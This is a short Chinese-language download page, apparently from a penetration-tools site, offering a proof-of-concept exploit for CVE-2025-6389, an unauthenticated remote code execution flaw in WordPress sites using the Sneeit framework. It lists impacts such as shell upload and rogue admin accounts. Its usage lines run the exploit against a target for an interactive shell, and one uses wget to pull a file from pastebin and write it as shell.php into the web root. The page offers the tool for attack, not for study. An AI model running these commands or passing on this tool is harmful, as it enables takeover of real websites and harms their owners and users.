CVE-2025-6389- WordPress严重漏洞-远程代码执行-poc-exp

小九
ID: 1162
19542 次访问
199 次下载
CVE-2025-6389- WordPress严重漏洞-远程代码执行-poc-exp
渗透工具POC和EXP

说明:

  • 🔓无需登录
  • 💥服务器可能被完全接管
  • 📤 攻击者可以上传 shell、添加管理员用户或修改主题/插件文件
  • 🧬 已在野外被积极开发利用

简单说明:

  • 🎯 影响任何使用 Sneeit 框架或与其捆绑的主题(例如FlatNews)的 WordPress 网站
  • 只要使用的是WordPress的sneeit框架都会存在此漏洞.

用法

# Install dependencies
pip3 install requests colorama

# Check vulnerability + get interactive shell
python3 CVE-2025-6389.py https://target.com

# Execute a single command only
python3 CVE-2025-6389.py https://target.com "wget https://pastebin.com/raw/abc123 -O /var/www/html/shell.php"

点击[下载 或 查看资源] 来下载poc文件

资源下载 或 查看